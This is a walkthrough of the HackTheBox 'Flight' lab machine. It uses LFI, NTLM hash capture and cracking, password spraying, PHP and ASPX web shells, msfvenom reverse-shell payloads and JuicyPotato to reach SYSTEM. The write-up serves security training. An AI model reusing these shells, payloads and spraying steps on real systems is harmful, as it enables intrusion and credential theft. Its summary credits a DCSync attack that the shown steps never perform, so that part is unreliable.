HTB - Flight

HTB – Flight

In this walk through, we will be going through the Flight room from HackTheBox. This room is rated as Hard on the platform and it consists of exploitation of LFI to capture user NTLM hash in order to get foothold on the system and for privilege escalation, DCSync Privilege was abused to get root. So, let’s get started without any delay.


Machine Info:

DescriptionFlight is a hard Windows machine that requires LFI exploitation to capture NTLM hash of a user to get the initial foothold. After later, lateral movement has to be done and at last for Privilege Escalation, hashes were dumped by abusing DCSync privilege.


  • I started off with an aggressive nmap scan and found multiple ports opened as expected from a Windows machine. The notable ones was 88 (Kerberos) that indicate we are dealing with an Active Directory environment here. Along with that, one interesting one here was port 80 (HTTP) which might gives us a initial access, in my opinion. Further, we have some common ports like – 139,445 (SMB), 389 (LDAP) and 135 (RPC).

$ sudo nmap -A
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( ) at 2023-12-06 12:34 IST

Nmap scan report for
Host is up (0.20s latency).
Not shown: 989 filtered ports
80/tcp   open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
| vulners: 
|   cpe:/a:apache:http_server:2.4.52: 
|     	CVE-2022-31813	7.5
|     	CVE-2022-23943	7.5
|     	CVE-2022-22720	7.5
|     	CNVD-2022-73123	7.5
|     	OSV:BIT-2023-31122	6.4
|     	CVE-2022-28615	6.4
|     	CVE-2021-44224	6.4
|     	CVE-2022-22721	5.8
|     	CVE-2022-36760	5.1
|     	OSV:BIT-2023-45802	5.0
|     	OSV:BIT-2023-43622	5.0
|     	F7F6E599-CEF4-5E03-8E10-FE18C4101E38	5.0	*EXPLOIT*
|     	E5C174E5-D6E8-56E0-8403-D287DE52EB3F	5.0	*EXPLOIT*
|     	DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	5.0	*EXPLOIT*
|     	CVE-2022-37436	5.0
|     	CVE-2022-30556	5.0
|     	CVE-2022-29404	5.0
|     	CVE-2022-28614	5.0
|     	CVE-2022-26377	5.0
|     	CVE-2022-22719	5.0
|     	CVE-2006-20001	5.0
|     	CNVD-2023-93320	5.0
|     	CNVD-2023-80558	5.0
|     	CNVD-2022-73122	5.0
|     	CNVD-2022-53584	5.0
|     	CNVD-2022-53582	5.0
|     	C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	5.0	*EXPLOIT*
|     	BD3652A9-D066-57BA-9943-4E34970463B9	5.0	*EXPLOIT*
|     	B0208442-6E17-5772-B12D-B5BE30FA5540	5.0	*EXPLOIT*
|     	A820A056-9F91-5059-B0BC-8D92C7A31A52	5.0	*EXPLOIT*
|     	9814661A-35A4-5DB7-BB25-A1040F365C81	5.0	*EXPLOIT*
|_    	17C6AD2A-8469-56C8-BBBE-1764D0DF1680	5.0	*EXPLOIT*
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-06 14:04:50Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-12-06T14:05:10
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
1   193.55 ms
2   194.25 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 195.11 seconds

nmap scan

nmap scan

  • Tried enumerating some users over RPC and SMB on port 135 and 445 respectively but found no luck.

enumerating users with RPC and LDAP

SMB enumeration

  • Next, enumerated the web server running on port 80 and found an Airlines static website running.

Airlines International travel

  • In the footer section, found a hostname – flight.htb. So added it to our /etc/hosts file.

Website Copyright

adding hostname

  • Next, used ffuf to enumerate some subdomains related to flight.htb domain and found a hit – school.

ffuf -u "http://flight.htb" -H "Host: FUZZ.flight.htb" -w ~/Desktop/Wordlist/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -fs 7069

subdomain bruteforcing

  • Added it to /etc/hosts file also and accessed it. Seems like a static website for an Aviation School.

adding hostname

Aviation School portal

  • I checked the about us page which has an interesting parameter called view which is calling the about.html page. This could be potentially vulnerable to LFI. I checked it and it blocked me for suspicious behaviour. Seems like it is vulnerable but filtering the entered input file.

view parameter in use

  • Next, i checked it for RFI and it does ping to my netcat listener however the connection status was close. That means, we won’t we able to get a connection back for our reverse shell if used. Thus, dismissing the possibility of Remote Code Execution.


Checking for file inclusion

got connection successfully

  • I checked the windows /etc/hosts file if we can access it and we can. Confirming the vulnerability.


Performing LFI Exploitation

  • The page source code reveals the filtering the application is performing for our input. As per the below code, it seems like we can request the shares with //. That’s interesting.

ini_set('display_errors', 0);
error_reporting(E_ERROR | E_WARNING | E_PARSE); 
if ((strpos(urldecode($_GET['view']),'..')!==false)||

Looking into the source code

Performing LLMNR Poisoning using Responder:

  • I setup responder to listen for the LLMNR/NBT-NS requests on our HTB and accessed a fake share on our IP address.

sudo python3 -I tun0


connect with our fake share

  • Once connected over our fake share, we can get the NTLMV2 hash for user svc_apache. Sweet!


captured svc_apache hash

  • Cracked the hash using hashcat and got the password.

hashcat -m 5600 hash.txt rockyou.txt

SVC_Apache hash

  • Next, sprayed the password on the IP address using crackmapexec to check if we can access it. It shows green however i was unable to get any shell neither via WinRM, Psexec or SMBexec as we didn’t had the writable shares.

crackmapexec smb -u svc_apache -d flight.htb -p 'S@Ss!K@*t13'

crackmapxec creds spray

Checking if port 5985 is open

No shell via Winrm

  • Moving on, I used crackmapexec to enumerate the potential users on the domain.

crackmapexec smb -u svc_apache -d flight.htb -p 'S@Ss!K@*t13' --users

crackmapexec user enum

  • Got the list of the usernames in a file.


Performing Password Spray attack:

  • Next, used the svc_apache password and perform a password spray on the usernames we just gathered. Got a hit on – S.Moon

crackmapexec smb flight.htb -u usernames.txt -p 'S@Ss!K@*t13'

crackmapexec password spray

  • Next, checked the shares we can access using S.Moon creds and found an interesting one called “Shared”.

$ smbmap -H flight.htb -u 'S.Moon' -p 'S@Ss!K@*t13'
[+] Finding open SMB ports....
[+] User SMB session established on flight.htb...
[+] IP: flight.htb:445	Name: unknown                                           
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
-- snipped --
	Shared                                            	READ, WRITE	
	dr--r--r--                0 Fri Sep 23 01:17:44 2022	.
	dr--r--r--                0 Fri Sep 23 01:17:44 2022	..
	dr--r--r--                0 Fri Sep 23 01:17:44 2022	flight.htb

-- snipped --

SMB share shared found

Performing URL Path Attack:

  • Next, i performed the URL file attack. In a URL file attack, If we have a shell access on the user and the user has a share access or has a SMB share with write permission. Then, we can make a file in the share and when somebody clicks on it, we will capture the hashes with responder. In this case, the user C.BUM is periodically checking the Shared folder and the file which is allowed to be uploaded in it is the desktop.ini file. So, i just created the same that contains a SMB point to my own IP address. Once the user visit or clicks on the file, i will get his hash at my responder listener.


smbclient //flight.htb/Shared --user s.moon --password 'S@Ss!K@*t13'

put test.txt desktop.ini

testing we can upload files

sudo python3 -I tun2 -v

  • Got the NTLMV2 hash for user “C.BUM”.


captured c.bum hash

  • Cracked it and got his password.

hashcat -m 5600 hash.txt rockyou.txt -O

c.bum hash

  • Next, checked the SMB share permissions for user C.BUM and found a Users directory inside it found the user flag.

smbmap -H flight.htb -u 'c.bum' -p 'Tikkycoll_431012284'

SMB access as C.BUM

smbclient //flight.htb/Users --user c.bum --password 'Tikkycoll_431012284'

get user.txt

user flag

  • In the above screenshot, we also had access to the “Web” directory. Inside it, we have the web server directories for both of our domains.

smbclient //flight.htb/Web --user c.bum --password 'Tikkycoll_431012284'

smb access with c.bum

Initial Access:

  • I uploaded a small PHP shell in the flight.htb directory to execute commands on the server.

echo system($_GET['c']);

put shell.php


HTB - Flight

  • Next, i generated a Windows meterpreter shell using msfvenom and uploaded it to the web directory.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe -o payload.exe

create payload with msfvenom

put payload.exe

  • Called it using our PHP shell and got our initial access.


got meterpreter shell

  • We currently have a shell as svc_apache but we possess the credentials for user c.bum. Let’s elevate our shell to user c.bum using RunasCs utility. For that, i first generated another payload and uploaded it to our web directory.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=5555 -f exe -o payload2.exe

generated another payload

upload payload2.exe

  • Next, downloaded the below exploit on our target machine and used it to execute our second payload to get shell access as user C.BUM.


powershell -ep bypass

. .\Invoke-RunasCs.ps1

Invoke-RunasCs -Username c.bum -Password 'Tikkycoll_431012284' -Domain flight.htb -Command "C:\xampp\htdocs\flight.htb\payload2.exe"

Invoke Runasc

getting another meterpreter shell

Lateral Movement:

  • Moving on, checked the listening ports on the machine and found an interesting one – 8080 that might we running some sort of web server that we didn’t had access to initially as per our port scan.

 netstat -ano

netstat output

  • Performed a port forwarding for the port 8080 to our local port at 8081.

portfwd add -l 8081 -p 8000 -r

setting up portfwd

  • Accessed the website on our local port 8081. Seems like another static website.

Internal Flight portal

  • Looked inside the web site directory running on port 8080 and found nothing interesting. Next, uploaded a simple aspx shell like we did with PHP to have some sort of shell access on the server.

looking to inetpub

cd development

<%@Page Language="C#"%><%var p=new System.Diagnostics.Process{StartInfo=

put aspx shell

got access as iis apppool user

  • Next, generated another payload and used the uploaded aspx shell to execute it to get a connection back with a shell access on the IIS server.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=6666 -f exe -o payload3.exe

payload3.exe created

upload payload3.exe


msfconsole -q

Privilege Escalation:

  • Performed some post-compromise enumeration and found the “SeImpersonatePrivilege” has been enabled. That means, we can use some sort of Potato exploits on this to get Admin.

c:\windows\system32\inetsrv>whoami /all
whoami /all


User Name                  SID                                                          
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415


Group Name                                 Type             SID          Attributes                                        
========================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                   
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                          Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                           Unknown SID type S-1-5-82-0   Mandatory group, Enabled by default, Enabled group


Privilege Name                Description                               State  
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeMachineAccountPrivilege     Add workstations to domain                Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

ERROR: Unable to get user claims information.

Checking privileges of user

  • Used the below JuicyPotato exploit and generated another payload for it using msfvenom.

Potato Exploit

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=7777 -f exe -o payload4.exe

created payload4.exe

  • Executed the exploit pointing it to run the payload4.exe binary which therefore grants us our “NT Authority/System” shell.

JuicyPotatoNG.exe -t * -p "C:\windows\system32\cmd.exe" -a "/c C:\temp\payload4.exe"

Executing JuicyPotato exploit

getting root

  • Finally captured the root flag and completed the room.

root flag

machine completed

Also Read:



So that was “Flight” for you. The machine features a website with two different virtual hosts. One of them was vulnerable to LFI and allowed us to retrieve an NTLM hash. Once cracked, the obtained clear text password was sprayed across a list of valid usernames to discover a password re-use scenario. Once we have SMB access as the user s.moon we were able to write to a share that gets accessed by other users. Certain files were then used to steal the NTLMv2 hash of the users that access the share. Once the second hash is cracked we were able to write a reverse shell in a share that hosts the web files and gain a shell on the box as low privileged user. Having credentials for the user c.bum, it was possible to gain a shell as this user, which allowed us to write an aspx web shell on a web site that’s configured to listen only on localhost. Once we had command execution as the Microsoft Virtual Account we were able to run Rubeus to get a ticket for the machine account that can be used to perform a DCSync attack. Thus, ultimately obtaining the hashes for the Administrator user. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top